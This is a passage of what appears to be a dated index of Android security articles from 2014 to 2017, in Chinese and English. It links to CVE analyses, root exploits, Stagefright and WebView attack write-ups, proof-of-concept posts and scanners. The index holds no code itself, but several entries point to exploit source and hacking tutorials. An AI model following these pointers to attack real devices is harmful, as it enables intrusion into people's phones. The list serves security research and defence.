Details的数据根本就不靠谱!](http://www.freebuf.com/articles/neopoints/125701.html) - 2017.02 [nsfocus] [Android Mediaserver远程代码执行漏洞(CVE-2017-0406)](http://www.nsfocus.net/index.php?act=advisory&do=view&adv_id=94) - 2017.01 [360] [安卓漏洞:攻击Nexus6和6p自定义引导模式](https://www.anquanke.com/post/id/85288/) - 2017.01 [securityintelligence] [Android Vulnerabilities: Attacking Nexus 6 and 6P Custom Boot Modes](https://securityintelligence.com/android-vulnerabilities-attacking-nexus-6-and-6p-custom-boot-modes/) - 2016.12 [360] [两个CVE案例分析:如何利用Android中的可信区域](https://www.anquanke.com/post/id/85184/) - 2016.12 [ms509] [Android Telephony拒绝服务漏洞(CVE-2016-6763)分析](http://www.ms509.com/2016/12/21/android-telephony-dos/) - 2016.12 [pediy] [[原创]CVE-2015-8966/AndroidID-31435731](https://bbs.pediy.com/thread-214585.htm) - 2016.12 [tencent] [CVE-2016-6771: Android语音信箱伪造漏洞分析](https://security.tencent.com/index.php/blog/msg/110) - 2016.12 [venus] [CVE-2016-6771: Android语音信箱伪造漏洞分析](https://paper.seebug.org/141/) - 2016.12 [HackingMonks] [Find vulnerability of ANDROID apps like FB (easy with steps)](https://www.youtube.com/watch?v=zbZhOmlDe8M) - 2016.11 [360] [Fuzzing Android:挖掘Android系统组件组件中的漏洞](https://www.anquanke.com/post/id/84979/) - 2016.11 [4hou] [什么样的OAuth 2.0协议漏洞能影响10亿Android APP账户?](http://www.4hou.com/vulnerable/1198.html) - 2016.11 [retme] [Rooting Every Android From Extension To Exploitation (slides)](http://retme.net/index.php/2016/11/06/Rooting-Every-Android-From-Extension-To-Exploitation.html) - 2016.11 [arxiv] [[1611.00837] Context-aware System Service Call-oriented Symbolic Execution of Android Framework with Application to Exploit Generation](https://arxiv.org/abs/1611.00837) - 2016.11 [trendmicro] [Security Update Patches 13 Android Vulnerabilities Discovered by Trend Micro](https://blog.trendmicro.com/trendlabs-security-intelligence/security-update-patches-13-android-vulnerabilities-discovered-trend-micro/) - 2016.11 [lookout] [DirtyCow and Drammer vulnerabilities let attackers root or hijack Android devices](https://blog.lookout.com/dirtycow-and-drammer) - 2016.10 [freebuf] [如何利用Rowhammer漏洞Root Android手机(含演示视频+Exploit源码)](http://www.freebuf.com/news/118163.html) - 2016.10 [freebuf] [阿里聚安全Android应用漏洞扫描器解析:本地拒绝服务检测详解](http://www.freebuf.com/sectool/117547.html) - 2016.10 [pediy] [[原创]安卓Stagefright高危漏洞分析学习总结](https://bbs.pediy.com/thread-213490.htm) - 2016.10 [pediy] [通杀所有系统的硬件漏洞?聊一聊Drammer,Android上的RowHammer攻击](https://bbs.pediy.com/thread-213472.htm) - 2016.10 [aliyun] [通杀所有系统的硬件漏洞?聊一聊Drammer,Android上的RowHammer攻击](https://xz.aliyun.com/t/448) - 2016.10 [contextis] [Targeting Android for OTA Exploitation](https://www.contextis.com/blog/targeting-android-ota-exploitation) - 2016.10 [konrad] [Exploiting JavaScript code in Android Email Apps](https://medium.com/p/b953f591e77) - 2016.10 [freebuf] [每16台Android手机中,就有一台受BadKernel漏洞的影响](http://www.freebuf.com/articles/terminal/115933.html) - 2016.09 [ms509] [Android漏洞CVE-2015-3825分析及exploit实战:从Crash到劫持PC](http://www.ms509.com/2016/09/30/android-cve2015-3825exp/) - 2016.09 [freebuf] [Android漏洞CVE-2015-3825分析及exploit实战:从Crash到劫持PC](http://www.freebuf.com/vuls/115352.html) - 2016.09 [trustlook] [Google Offers $200,000 to Find Android Vulnerabilities](https://blog.trustlook.com/2016/09/15/google-offers-200000-to-find-android-vulnerabilities/) - 2016.09 [4hou] [换一种方式利用安卓系统漏洞](http://www.4hou.com/vulnerable/2053.html) - 2016.09 [securitygossip] [PREC: Practical Root Exploit Containment for Android Devices](http://securitygossip.com/blog/2016/09/13/2016-09-13/) - 2016.09 [sjtu] [PREC: Practical Root Exploit Containment for Android Devices](https://loccs.sjtu.edu.cn/gossip/blog/2016/09/13/2016-09-13/) - 2016.09 [googleprojectzero] [Return to libstagefright: exploiting libutils on Android](https://googleprojectzero.blogspot.com/2016/09/return-to-libstagefright-exploiting.html) - 2016.08 [4hou] [Linux漏洞可导致约14亿安卓设备被攻击](http://www.4hou.com/info/2854.html) - 2016.08 [freebuf] [14亿Android设备受Linux TCP漏洞的影响](http://www.freebuf.com/news/112245.html) - 2016.08 [fortinet] [Deep Analysis of CVE-2016-3820 - Remote Code Execution Vulnerability in Android Mediaserver](https://www.fortinet.com/blog/threat-research/deep-analysis-of-cve-2016-3820-remote-code-execution-vulnerability-in-android-mediaserver.html) - 2016.08 [welivesecurity] [QuadRooter vulnerabilities leaves 900 million Android devices at risk of attack](https://www.welivesecurity.com/2016/08/11/quadrooter-vulnerabilities-leaves-900-million-android-devices-risk-attack/) - 2016.08 [freebuf] [高通曝Quadrooter高危漏洞, 影响全球9亿安卓用户](http://www.freebuf.com/vuls/111362.html) - 2016.08 [checkpoint] [QuadRooter: New Android Vulnerabilities in Over 900 Million Devices | Check Point Software Blog](https://blog.checkpoint.com/2016/08/07/quadrooter/) - 2016.07 [h2hconference] [Breno Silva - Defeat Android Kernel Exploitation - H2HC 2014](https://www.youtube.com/watch?v=BHysM03pty8) - 2016.07 [securitygossip] [An Application Package Configuration Approach to Mitigation Android SSL Vulnerabilities](http://securitygossip.com/blog/2016/07/25/2016-07-25/) - 2016.07 [sjtu] [An Application Package Configuration Approach to Mitigation Android SSL Vulnerabilities](https://loccs.sjtu.edu.cn/gossip/blog/2016/07/25/2016-07-25/) - 2016.06 [duo] [Thirty Percent of Android Devices Susceptible to 24 Critical Vulnerabilities](https://duo.com/blog/thirty-percent-of-android-devices-susceptible-to-24-critical-vulnerabilities) - 2016.06 [lookout] [Android June Security Bulletin: Vulnerabilities increasing](https://blog.lookout.com/june-android-security-bulletin) - 2016.05 [pediy] [[原创][首发]CVE-2015-1805 安卓手机提权ROOT漏洞 分析](https://bbs.pediy.com/thread-210503.htm) - 2016.05 [securitygossip] [Analyzing Android Browser Apps for File:// Vulnerabilities](http://securitygossip.com/blog/2016/05/25/2016-05-25/) - 2016.05 [sjtu] [Analyzing Android Browser Apps for File:// Vulnerabilities](https://loccs.sjtu.edu.cn/gossip/blog/2016/05/25/2016-05-25/) - 2016.05 [duo] [Sixty Percent of Enterprise Android Phones Affected by Critical QSEE Vulnerability](https://duo.com/blog/sixty-percent-of-enterprise-android-phones-affected-by-critical-qsee-vulnerability) - 2016.05 [kaspersky] [Android under attacks: old vulnerabilities, present threats](https://www.kaspersky.com/blog/android-under-attacks-old-vulnerabilities-present-threats/5564/) - 2016.04 [freebuf] [Android Minikin 库越界写拒绝服务漏洞分析](http://www.freebuf.com/articles/system/102643.html) - 2016.04 [fortinet] [Analysis of CVE-2016-2414 - Out-of-Bound Write Denial of Service Vulnerability in Android Minikin Library](https://www.fortinet.com/blog/threat-research/analysis-of-cve-2016-2414-out-of-bound-write-denial-of-service-vulnerability-in-android-minikin-library-1.html) - 2016.04 [welivesecurity] [Introducing Metaphor: Another Android Stagefright exploit](https://www.welivesecurity.com/2016/04/07/introducing-metaphor-another-android-stagefright-exploit/) - 2016.04 [freebuf] [Android提权漏洞CVE-2014-7920、CVE-2014-7921分析](http://www.freebuf.com/vuls/100785.html) - 2016.03 [blackmoreops] [Android vulnerability allows attackers root access](https://www.blackmoreops.com/2016/03/31/android-vulnerability-allows-attackers-root-access/) - 2016.03 [trendmicro] [Critical ‘CVE-2015-1805’ Vulnerability Allows Permanent Rooting of Most Android Phones](https://blog.trendmicro.com/trendlabs-security-intelligence/critical-cve-2015-1805-vulnerability-allows-permanent-rooting-android-phones/) - 2016.03 [360] [Truecaller远程代码执行漏洞影响100万安卓设备](https://www.anquanke.com/post/id/83697/) - 2016.03 [] [Android系统漏洞提权](http://www.91ri.org/15445.html) - 2016.03 [trendmicro] [Vulnerabilities on SoC-powered Android devices have implications for the IoT](http://blog.trendmicro.com/vulnerabilities-on-soc-powered-android-devices-have-implications-for-the-iot/) - 2016.03 [trendmicro] [Android Vulnerabilities Allow For Easy Root Access](https://blog.trendmicro.com/trendlabs-security-intelligence/android-vulnerabilities-allow-easy-root-access/) - 2016.03 [freebuf] [安卓版百度浏览器远程代码执行漏洞分析](http://www.freebuf.com/vuls/97607.html) - 2016.02 [knownsec] [安卓微信、QQ自带浏览器 UXSS 漏洞](http://blog.knownsec.com/2016/02/android-weixin-qq-uxss/) - 2016.02 [securityresear] [Android Serialization Vulnerabilities Revisited (RSAC USA '16)](http://securityresear.ch/2016/02/27/android-serialization-vulnerabilities/) - 2016.02 [pediy] [[原创][首发]cve-2015-0569 安卓手机提权ROOT漏洞 分析](https://bbs.pediy.com/thread-208066.htm) - 2016.02 [welivesecurity] [Android has some critical remotely-exploitable security holes. But can you get the patch?](https://www.welivesecurity.com/2016/02/02/android-security-holes/) - 2016.02 [freebuf] [安卓提权漏洞分析(CVE-2014-7920、CVE-2014-7921)](http://www.freebuf.com/vuls/94509.html) - 2016.01 [bits] [Android privilege escalation to mediaserver from zero permissions (CVE-2014-7920 + CVE-2014-7921)](http://bits-please.blogspot.com/2016/01/android-privilege-escalation-to.html) - 2016.01 [duo] [Introducing X-Ray 2.0: Vulnerability Detection for Android Devices](https://duo.com/blog/introducing-x-ray-2-0-vulnerability-detection-for-android-devices) - 2016.01 [evilsocket] [Autopwn Every Android < 4.2 Device on Your Network Using BetterCap and the addJavascriptInterface Vulnerability.](https://www.evilsocket.net/2016/01/18/autopwn-every-android-device-on-your-network-using-bettercap-the-and-addjavascriptinterface-vulnerability/) - 2016.01 [duo] [Google Patches for Critical Android Vulnerabilities](https://duo.com/blog/google-patches-for-critical-android-vulnerabilities) - 2015.12 [attify] [Android Application Security Vulnerability : Hacking Twitter Vine app](http://blog.attify.com/2015/12/24/android-application-security-vulnerability-hacking-twitter-vine-app/) - 2015.12 [attify] [Android Application Security Vulnerability : Hacking Twitter Vine app](https://blog.attify.com/android-application-security-vulnerability-hacking-twitter-vine-app/) - 2015.12 [flanker017] [ANDROIDID-24123723 (CVE-2015-6620) POC and writeup](https://blog.flanker017.me/androidid-24123723-cve-2015-6620-poc-and-writeup/) - 2015.12 [freebuf] [Android WebView远程执行代码漏洞浅析](http://www.freebuf.com/vuls/90552.html) - 2015.12 [nsfocus] [Android WebView 远程执行代码漏洞浅析](http://blog.nsfocus.net/android-webview-remote-code-execution-vulnerability-analysis/) - 2015.12 [360] [Android漏洞利用方式之NFC浅析](https://www.anquanke.com/post/id/83073/) - 2015.12 [360] [Android平台下二维码漏洞攻击杂谈](https://www.anquanke.com/post/id/83032/) - 2015.11 [comparitech] [This week in InfoSec – Chrome says goodbye to ageing operating systems, checking for Android vulnerabilities, home user tips and how to make security your next career move](https://www.comparitech.com/blog/this-week-in-infosec-chrome-says-goodbye-to-ageing-operating-systems-checking-for-android-vulnerabilities-home-user-tips-and-how-to-make-security-your-next-career-move/) - 2015.11 [freebuf] [Hacking Team安卓浏览器攻击过程中的漏洞分析 Stage4](http://www.freebuf.com/vuls/84720.html) - 2015.11 [freebuf] [AndroidVTS:Android手机漏洞缺陷检测App](http://www.freebuf.com/sectool/84526.html) - 2015.11 [angelalonso] [PoC to exploit Android Wormhole Vulnerability](http://blog.angelalonso.es/2015/11/poc-to-exploit-android-wormhole.html) - 2015.11 [freebuf] [Hacking Team安卓浏览器攻击过程中的漏洞分析 Stage3](http://www.freebuf.com/vuls/83950.html) - 2015.10 [freebuf] [FreeBuf 追踪报道:虫洞(wormhole)漏洞来袭,多款百度热门安卓应用中枪](http://www.freebuf.com/news/83271.html) - 2015.10 [freebuf] [Hacking Team安卓浏览器攻击过程中的漏洞分析 Stage 2](http://www.freebuf.com/vuls/82977.html) - 2015.10 [freebuf] [美运营商4G网络存在漏洞,波及所有安卓用户](http://www.freebuf.com/vuls/82276.html) - 2015.10 [welivesecurity] [LTE vulnerabilities puts Android devices at risk of attack](https://www.welivesecurity.com/2015/10/19/lte-vulnerabilities-puts-android-devices-risk-attack/) - 2015.10 [360] [Android 5.0屏幕录制漏洞(CVE-2015-3878)威胁预警](https://www.anquanke.com/post/id/82740/) - 2015.10 [trendmicro] [Android Security Update Includes Fix for Stagefright Vulnerabilities Discovered by Trend Micro](https://blog.trendmicro.com/trendlabs-security-intelligence/android-security-update-includes-fix-for-stagefright-vulnerabilities-discovered-by-trend-micro/) - 2015.10 [8090] [iOS漏洞竟然8倍于安卓!!!](http://www.8090-sec.com/archives/886) - 2015.10 [hackingarticles] [Hack Android Phone WhatsApp and all Directories using Mercury Browser Vulnerability](http://www.hackingarticles.in/hack-android-phone-whatsapp-and-all-directories-using-mercury-browser-vulnerability/) - 2015.10 [freebuf] [Hacking Team安卓浏览器攻击过程中的漏洞分析 Stage1](http://www.freebuf.com/vuls/80873.html) - 2015.10 [] [QARK-快速的Android漏洞的审计工具](http://www.91ri.org/14351.html) - 2015.10 [freebuf] [Stagefright 2.0漏洞来袭 影响上亿安卓用户](http://www.freebuf.com/news/80427.html) - 2015.09 [freebuf] [Android漏洞检测套件](http://www.freebuf.com/news/80028.html) - 2015.09 [freebuf] [Hacking Team安卓浏览器攻击过程中的漏洞分析 Stage0](http://www.freebuf.com/vuls/78594.html) - 2015.09 [360] [Android 5.x 锁屏绕过 (CVE-2015-3860)](https://www.anquanke.com/post/id/82416/) - 2015.09 [freebuf] [Android 5.x漏洞:黑客可以绕过屏幕密码进入系统](http://www.freebuf.com/articles/terminal/78455.html) - 2015.09 [trustlook] [Android signature verification vulnerability and exploitation](https://blog.trustlook.com/2015/09/09/android-signature-verification-vulnerability-and-exploitation/) - 2015.09 [TheHackerStuff] [Android Bugs - Top 5 New Android Vulnerabilities 2017](https://www.youtube.com/watch?v=UBVv69KZ2u0) - 2015.09 [freebuf] [安卓平台Mercury浏览器漏洞分析](http://www.freebuf.com/vuls/77067.html) - 2015.08 [] [Android libcutils库中整数溢出导致的堆破坏漏洞的发现与利用](http://blogs.360.cn/blog/android-libcutils%e5%ba%93%e4%b8%ad%e6%95%b4%e6%95%b0%e6%ba%a2%e5%87%ba%e5%af%bc%e8%87%b4%e7%9a%84%e5%a0%86%e7%a0%b4%e5%9d%8f%e6%bc%8f%e6%b4%9e%e7%9a%84%e5%8f%91%e7%8e%b0%e4%b8%8e%e5%88%a9%e7%94%a8/) - 2015.08 [welivesecurity] [Dolphin and Mercury Android browsers have major vulnerabilities](https://www.welivesecurity.com/2015/08/26/dolphin-mercury-android-browsers-major-vulnerabilities/) - 2015.08 [bits] [Android linux kernel privilege escalation (CVE-2014-4323)](http://bits-please.blogspot.com/2015/08/android-linux-kernel-privilege_26.html) - 2015.08 [benthamsgaze] [Experimenting with SSL Vulnerabilities in Android Apps](https://www.benthamsgaze.org/2015/08/20/experimenting-with-ssl-vulnerabilities-in-android-apps/) - 2015.08 [trendmicro] [MediaServer Takes Another Hit with Latest Android Vulnerability](https://blog.trendmicro.com/trendlabs-security-intelligence/mediaserver-takes-another-hit-with-latest-android-vulnerability/) - 2015.08 [freebuf] [安卓预装插件“证书门”漏洞分析还原](http://www.freebuf.com/vuls/75228.html) - 2015.08 [bits] [Android linux kernel privilege escalation vulnerability and exploit (CVE-2014-4322)](http://bits-please.blogspot.com/2015/08/android-linux-kernel-privilege.html) - 2015.08 [securityintelligence] [One Class to Rule Them All: New Android Serialization Vulnerability Gives Underprivileged Apps Super Status](https://securityintelligence.com/one-class-to-rule-them-all-new-android-serialization-vulnerability-gives-underprivileged-apps-super-status/) - 2015.08 [checkpoint] [MEDIA ALERT: Check Point Discovers Massive Vulnerability in Android Devices](https://www.checkpoint.com/press/2015/media-alert-check-point-discovers-massive-vulnerability-in-android-devices/) - 2015.08 [freebuf] [安卓曝无限重启漏洞(CVE-2015-3823),影响近90%安卓手机用户](http://www.freebuf.com/news/74261.html) - 2015.08 [freebuf] [Android Broadcast组件权限绕过漏洞](http://www.freebuf.com/articles/terminal/73885.html) - 2015.07 [freebuf] [安卓再曝新漏洞:可远程致使用户无法接打电话](http://www.freebuf.com/news/73755.html) - 2015.07 [acunetix] [In the headlines: Android vulnerabilities, MongoDB database and more](https://www.acunetix.com/blog/articles/in-the-headlines-android-vulnerabilities-mongodb-database-and-more/) - 2015.07 [freebuf] [技术分析:关于安卓libStagefright系列漏洞分析](http://www.freebuf.com/vuls/73618.html) - 2015.07 [arxiv] [[1507.08694] Android Tapjacking Vulnerability](https://arxiv.org/abs/1507.08694) - 2015.07 [trendmicro] [Trend Micro Discovers Vulnerability That Renders Android Devices Silent](https://blog.trendmicro.com/trendlabs-security-intelligence/trend-micro-discovers-vulnerability-that-renders-android-devices-silent/) - 2015.07 [pediy] [[讨论][分享]关于最近很火的安卓stagefright漏洞](https://bbs.pediy.com/thread-202868.htm) - 2015.07 [virusbulletin] [Stagefright vulnerability leaves 950 million Android devices vulnerable to remote code execution](https://www.virusbulletin.com/blog/2015/07/stagefright-vulnerability-leaves-950-million-android-devices-vulnerable-remote-code-execution/) - 2015.07 [trendmicro] [Epic Android Vulnerability – What does it mean for you?](http://blog.trendmicro.com/epic-android-vulnerability-what-does-it-mean-for-you/) - 2015.07 [freebuf] [安卓Stagefright高危漏洞初探](http://www.freebuf.com/articles/terminal/73517.html) - 2015.07 [sans] [Android Stagefright multimedia viewer prone to remote exploitation](https://isc.sans.edu/forums/diary/Android+Stagefright+multimedia+viewer+prone+to+remote+exploitation/19965/) - 2015.07 [tencent] [Hacking Team Android Browser Exploit代码分析](https://security.tencent.com/index.php/blog/msg/87) - 2015.07 [ele7enxxh] [CVE-2014-7911安卓本地提权漏洞详细分析](http://ele7enxxh.com/CVE-2014-7911-Detailed-Analysis-Of-Android-Local-Privilege-Escalation-To-System-Vulnerability.html) - 2015.07 [ele7enxxh] [被夸大的安卓漏洞“寄生兽”](http://ele7enxxh.com/Exaggerated-Android-Vulnerability-Parasyte.html) - 2015.07 [vxsecurity] [[ VXSecurity.sg Vulnerability Research Advisory : ALZip for Android ZIP Archive Extraction Directory Traversal & Local File Inclusion Vulnerability ]](http://www.vxsecurity.sg/2015/07/01/vxsecurity-sg-vulnerability-research-advisory-alzip-for-android-zip-archive-extraction-directory-traversal-local-file-inclusion-vulnerability/) - 2015.06 [freebuf] [Android调试器存在漏洞,可获取设备内存数据](http://www.freebuf.com/news/71157.html) - 2015.06 [trendmicro] [Trend Micro Discovers Android Vulnerability that Can Lead to Exposure of Device Memory Content](https://blog.trendmicro.com/trendlabs-security-intelligence/trend-micro-discovers-android-vulnerability-that-can-lead-to-exposure-of-device-memory-content/) - 2015.05 [securify] [Exploiting the Xamarin.Android DLL hijack vulnerability](https://securify.nl/en/blog/SFY20150502/exploiting-the-xamarin_android-dll-hijack-vulnerability.html) - 2015.05 [tencent] [Android 9patch 图片解析堆溢出漏洞分析(CVE-2015-1532)](https://security.tencent.com/index.php/blog/msg/85) - 2015.05 [trendmicro] [Trend Micro Discovers Apache Cordova Vulnerability that Allows One-Click Modification of Android Apps](https://blog.trendmicro.com/trendlabs-security-intelligence/trend-micro-discovers-apache-vulnerability-that-allows-one-click-modification-of-android-apps/) - 2015.05 [ms509] [CVE-2014-7911安卓序列化漏洞分析](http://www.ms509.com/2015/05/25/cve-2014-7911/) - 2015.05 [microsoft] [Mass vulnerabilities in Android applications spike industry vulnerability disclosures in 4th Quarter 2014](https://cloudblogs.microsoft.com/microsoftsecure/2015/05/14/mass-vulnerabilities-in-android-applications-spike-industry-vulnerability-disclosures-in-4th-quarter-2014/) - 2015.05 [arxiv] [[1505.00589] Danger is My Middle Name: Experimenting with SSL Vulnerabilities in Android Apps](https://arxiv.org/abs/1505.00589) - 2015.04 [freebuf] [AwSnap:让全版本(Windows、iOS、Android)Chrome浏览器崩溃的有趣漏洞](http://www.freebuf.com/news/63233.html) - 2015.04 [skycure] [Skycure Protects Against The “Android Installer Hijacking” Vulnerability](https://www.skycure.com/blog/skycure-protects-against-the-android-installer-hijacking-vulnerability/) - 2015.03 [] [一条短信控制你的手机! Android平台的SQL注入漏洞浅析](http://www.91ri.org/12562.html) - 2015.03 [paloaltonetworks] [Android Installer Hijacking Vulnerability Could Expose Android Users t](https://unit42.paloaltonetworks.com/android-installer-hijacking-vulnerability-could-expose-android-users-to-malware/) - 2015.03 [tencent] [一条短信控制你的手机! Android平台的SQL注入漏洞浅析](https://security.tencent.com/index.php/blog/msg/79) - 2015.03 [freebuf] [Android HTTPS中间人劫持漏洞浅析](http://www.freebuf.com/articles/terminal/61216.html) - 2015.03 [] [Android HTTPS中间人劫持漏洞浅析](http://www.91ri.org/12534.html) - 2015.03 [securityintelligence] [DroppedIn: Remotely Exploitable Vulnerability in the Dropbox SDK for Android](https://securityintelligence.com/droppedin-remotely-exploitable-vulnerability-in-the-dropbox-sdk-for-android/) - 2015.03 [securityresear] [(CVE-2014-8889) Remotely Exploitable Vulnerability in the Dropbox SDK for Android](http://securityresear.ch/2015/03/11/cve-2014-8889-remotely-exploitable/) - 2015.01 [] [Android libcutils库中整数溢出导致的堆破坏漏洞的发现与利用](http://blogs.360.cn/post/android-libcutils%E5%BA%93%E4%B8%AD%E6%95%B4%E6%95%B0%E6%BA%A2%E5%87%BA%E5%AF%BC%E8%87%B4%E7%9A%84%E5%A0%86%E7%A0%B4%E5%9D%8F%E6%BC%8F%E6%B4%9E%E7%9A%84%E5%8F%91%E7%8E%B0%E4%B8%8E%E5%88%A9%E7%94%A8.html) - 2015.01 [checkpoint] [Threat Advisory - CVE-2014-7911: A New Root Exploit for Android | Check Point Software Blog](https://blog.checkpoint.com/2015/01/26/threat-advisory-cve-2014-7911-new-root-exploit-android/) - 2015.01 [] [An integer overflow in Android media could be exploited to get media_server permission(CVE-2015-1530)](http://blogs.360.cn/post/an-integer-overflow-in-android-media-could-be-exploited-to-get-media_server-permission.html) - 2015.01 [] [Integer overflow leading to heap corruption while unflattening GraphicBuffer In Android(CVE-2015-1474)](http://blogs.360.cn/post/integer-overflow-leading-to-heap-corruption-while-unflattening-graphicbuffer-in-android.html) - 2015.01 [integrity] [Good for Enterprise Android HTML Injection (CVE-2014-4925)](https://labs.integrity.pt/articles/good-for-enterprise-android-html-injection-cve-2014-4925/) - 2015.01 [integrity] [CVE-2014-4925 HTML injection in Good For Enterprise Android](https://labs.integrity.pt/advisories/cve-2014-4925/) - 2015.01 [hackingarticles] [How to Scan Web Vulnerability using Android Phone](http://www.hackingarticles.in/how-to-scan-web-vulnerability-using-android-phone/) - 2015.01 [] [Android APP通用型拒绝服务漏洞分析报告](http://blogs.360.cn/blog/android-app%e9%80%9a%e7%94%a8%e5%9e%8b%e6%8b%92%e7%bb%9d%e6%9c%8d%e5%8a%a1%e6%bc%8f%e6%b4%9e%e5%88%86%e6%9e%90%e6%8a%a5%e5%91%8a/) - 2015.01 [] [Android APP通用型拒绝服务漏洞分析报告](http://blogs.360.cn/post/android-app%E9%80%9A%E7%94%A8%E5%9E%8B%E6%8B%92%E7%BB%9D%E6%9C%8D%E5%8A%A1%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E6%8A%A5%E5%91%8A.html) - 2015.01 [rapid7] [12 Days of HaXmas: A year of Metasploit Android exploits](https://blog.rapid7.com/2015/01/02/2014-a-year-of-android-exploits-in-metasploit/) - 2014.12 [freebuf] [窃取Facebook用户信息:利用Android同源策略漏洞的恶意应用被发现](http://www.freebuf.com/news/55210.html) - 2014.12 [trendmicro] [Facebook Users Targeted By Android Same Origin Policy Exploit](https://blog.trendmicro.com/trendlabs-security-intelligence/facebook-users-targeted-by-android-same-origin-policy-exploit/) - 2014.12 [pediy] [[原创]Android证书验证存漏洞 开发者身份信息可被篡改](https://bbs.pediy.com/thread-195148.htm) - 2014.11 [lightless] [Android Resend SMS POC CVE-2014-8610](https://lightless.me/archives/CVE-2014-8610.html) - 2014.11 [attify] [Box Android and iOS application Security vulnerabilities : Writeup](http://blog.attify.com/2014/11/19/box-android-ios-application-security-vulnerabilities-writeup/) - 2014.11 [attify] [Box Android and iOS application Security vulnerabilities : Writeup](https://blog.attify.com/box-android-ios-application-security-vulnerabilities-writeup/) - 2014.11 [L173864930] [Android BroadcastAnyWhere(Google Bug 17356824)漏洞详细分析](https://blog.csdn.net/L173864930/article/details/41246255) - 2014.11 [attify] [Android Security and Exploitation Training](http://blog.attify.com/2014/11/12/android-security-exploitation-training/) - 2014.11 [attify] [Android Security and Exploitation Training](https://blog.attify.com/android-security-exploitation-training/) - 2014.10 [arxiv] [[1410.7745] An Application Package Configuration Approach to Mitigating Android SSL Vulnerabilities](https://arxiv.org/abs/1410.7745) - 2014.10 [vimeo] [SILICA exploiting Android WebView.addJavaScriptInterface](https://vimeo.com/109831748) - 2014.10 [checkmarx] [Pakistani Ethical Hacker Reveals How He Exposed Android Vulnerabilities](https://www.checkmarx.com/2014/10/21/pakistani-ethical-hacker/) - 2014.10 [devco] [Android WebView 為你的使用者打開了漏洞之門你知道嗎?](https://devco.re/blog/2014/10/13/android-webview-left-shortcuts-for-hacker/) - 2014.10 [pediy] [[原创]Android Webview UXSS 漏洞攻防](https://bbs.pediy.com/thread-193109.htm) - 2014.10 [tencent] [Android Webview UXSS 漏洞攻防](https://security.tencent.com/index.php/blog/msg/70) - 2014.10 [riusksk] [Android Webview UXSS 漏洞攻防](http://riusksk.me/2014/10/09/Android-Webview-UXSS-漏洞攻防/) - 2014.10 [freebuf] [Android(4.4版本以下)浏览器同源策略绕过漏洞](http://www.freebuf.com/vuls/44763.html) - 2014.10 [integrity] [Outlook.com android app HTML injection vulnerability](https://labs.integrity.pt/articles/outlook-com-android-app-html-injection-vulnerability/) - 2014.09 [checkpoint] [Vulnerability Discovered Within Default Android Web Browser | Check Point Software Blog](https://blog.checkpoint.com/2014/09/29/vulnerability-discovered-within-default-android-web-browser/) - 2014.09 [trustlook] [Major Android Vulnerability, 75% Android Users Are "Abandoned"](https://blog.trustlook.com/2014/09/22/major-android-vulnerability-75-android-users-abandoned/) - 2014.09 [rapid7] [Major Android Bug is a Privacy Disaster (CVE-2014-6041)](https://blog.rapid7.com/2014/09/15/major-android-bug-is-a-privacy-disaster-cve-2014-6041/) - 2014.09 [cmu] [Finding Android SSL Vulnerabilities with CERT Tapioca](https://insights.sei.cmu.edu/cert/2014/09/-finding-android-ssl-vulnerabilities-with-cert-tapioca.html) - 2014.09 [tencent] [Android FakeID任意代码注入执行漏洞简析](https://security.tencent.com/index.php/blog/msg/64) - 2014.08 [freebuf] [趋势科技发现支付宝安卓版漏洞](http://www.freebuf.com/articles/terminal/41482.html) - 2014.08 [pediy] [[原创]Android LaunchAnyWhere (Google Bug 7699048)漏洞详解及防御措施](https://bbs.pediy.com/thread-191490.htm) - 2014.08 [L173864930] [Android LaunchAnyWhere (Google Bug 7699048)漏洞详解及防御措施](https://blog.csdn.net/L173864930/article/details/38755621) - 2014.08 [pediy] [[原创]Android FakeID(Google Bug 13678484) 漏洞详解](https://bbs.pediy.com/thread-191258.htm) - 2014.08 [trendmicro] [The Dangers of the Android FakeID Vulnerability](https://blog.trendmicro.com/trendlabs-security-intelligence/the-dangers-of-the-android-fakeid-vulnerability/) - 2014.08 [L173864930] [Android FakeID(Google Bug 13678484) 漏洞详解](https://blog.csdn.net/L173864930/article/details/38409521) - 2014.08 [securityintelligence] [Apache Cordova Vulnerability Discovered: 10% of Android Banking Apps Potentially Vulnerable](https://securityintelligence.com/apache-cordova-phonegap-vulnerability-android-banking-apps/) - 2014.08 [trendmicro] [Vulnerability in Spotify Android App May Lead to Phishing](https://blog.trendmicro.com/trendlabs-security-intelligence/vulnerability-in-spotify-android-app-may-lead-to-phishing/) - 2014.08 [trendmicro] [Evernote Patches Vulnerability in Android App](https://blog.trendmicro.com/trendlabs-security-intelligence/evernote-patches-vulnerability-in-android-app/) - 2014.08 [] [Android 4.4.2 安全USB调试绕过漏洞](http://www.91ri.org/10270.html) - 2014.07 [freebuf] [Android又爆重大漏洞:谁之祸根,谁该庆幸](http://www.freebuf.com/news/39599.html) - 2014.07 [trustlook] [Android FakeID Vulnerability Affects 98% of Android Users](https://blog.trustlook.com/2014/07/30/android-fakeid-vulnerability-affects-98-android-users/) - 2014.07 [trendmicro] [Vulnerabilities in Alipay Android App Fixed](https://blog.trendmicro.com/trendlabs-security-intelligence/vulnerabilities-in-alipay-android-app-fixed/) - 2014.06 [securityresear] [Android KeyStore Buffer Overflow (CVE-2014-3100)](http://securityresear.ch/2014/06/24/android-keystore-buffer-overflow-cve/) - 2014.06 [retme] [SLAB 溢出攻击 & CVE-2014-0196 exploit for Android](http://retme.net/index.php/2014/06/19/SLAB-ATTACK.html) - 2014.06 [] [OpenSSL六漏洞再公开,安卓客户端受影响](http://blogs.360.cn/blog/openssl-bugs-06-05/) - 2014.06 [airbuscybersecurity] [Local root vulnerability in Android 4.4.2](http://blog.airbuscybersecurity.com/post/2014/06/Android-4.4.3%2C-or-fixing-an-old-local-root) - 2014.05 [arxiv] [[1405.6282] A Sink-driven Approach to Detecting Exposed Component Vulnerabilities in Android Apps](https://arxiv.org/abs/1405.6282) - 2014.05 [] [从android短信漏洞到手机钓鱼木马](http://www.91ri.org/9047.html) - 2014.05 [trustlook] [Security Vulnerability on Audible Android App](https://blog.trustlook.com/2014/05/05/audible_vulnerability/) - 2014.04 [freebuf] [从Android短信漏洞到手机钓鱼木马](http://www.freebuf.com/articles/terminal/33060.html) - 2014.04 [arxiv] [[1404.4553] Analyzing Android Browser Apps for file:// Vulnerabilities](https://arxiv.org/abs/1404.4553) - 2014.04 [] [HeartBleed漏洞对安卓客户端的影响](http://blogs.360.cn/blog/heartbleed-on-android/) - 2014.04 [retme] [CVE-2013-2094 exploit for Android](http://retme.net/index.php/2014/04/02/CVE-2013-2094.html) - 2014.04 